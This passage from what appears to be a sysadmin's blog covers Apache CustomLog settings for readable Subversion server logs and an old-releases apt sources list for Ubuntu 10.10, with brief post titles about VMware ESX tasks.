and it says, i do, i do (if logs are formatted correctly).
per: http://svnbook.red-bean.com/en/1.6/svn-book.pdf
<Location /svn>
DAV svn
</Location>
CustomLog logs/svn_logfile "%t %u %{SVN-ACTION}e" env=SVN-ACTION
results in this:
[26/Jan/2007:22:24:20 -0600] fritz get-dir /tags r1729 props
that's not useful.
but, more useful than:
[26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/vcc/default HTTP/1.1" 207 398
[26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/bln/59 HTTP/1.1" 207 449
[26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc HTTP/1.1" 207 647
[26/Jan/2007:22:25:29 -0600] "REPORT /svn/calc/!svn/vcc/default HTTP/1.1" 200 607
[26/Jan/2007:22:25:31 -0600] "OPTIONS /svn/calc HTTP/1.1" 200 188
[26/Jan/2007:22:25:31 -0600] "MKACTIVITY
/svn/calc/!svn/act/e6035ef7-5df0-4ac0-b811-4be7c823f998 HTTP/1.1" 201 227
gross.
But if we do this:
CustomLog logs/svn_logfile "%{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e (%B Bytes in %T Sec)" env=SVN-ACTION
we get this:
[2007-Jan-26 22:22:24:20] fritz@192.168.6.6 200 repo:project get-dir /tags r1729 props (10 Bytes in 10 Sec)
(thanks to this: http://peternixon.net/news/2010/04/09/useful-subversion-server-logs-apache-customlog/ for the clue)
the above only works if have your svn server set up as a Virtual host. Otherwise, place that line right along with your other log directive. reload apache2 and there you go. log rotation would be a good idea, too.
Thursday, July 24, 2014
ubuntu 10.10 apt.sources
no snappy title. i'm tired of shifting apt.sources. is it really needed, all these name and path changes? oh well, it keeps us sysadmins busy, right?
/etc/apt/sources.list deb http://old-releases.ubuntu.com/ubuntu/ maverick main restricted deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates main restricted deb http://old-releases.ubuntu.com/ubuntu/ maverick universe deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates universe deb http://old-releases.ubuntu.com/ubuntu/ maverick multiverse deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates multiverse deb http://old-releases.ubuntu.com/ubuntu/ maverick-security main restricted deb http://old-releases.ubuntu.com/ubuntu/ maverick-security universe deb http://old-releases.ubuntu.com/ubuntu/ maverick-security multiverse After updating your file: sudo apt-get clean sudo apt-get update
Friday, July 18, 2014
esx is nastay or find tasks and disks and oh my 5.5 you hate my vmtx don't you
Collecting info about tasks in ESX and ESXi
COLLECTING INFORMATION ABOUT TASKS IN VMWARE ESX AND ESXI
Subscribe to:
Posts (Atom)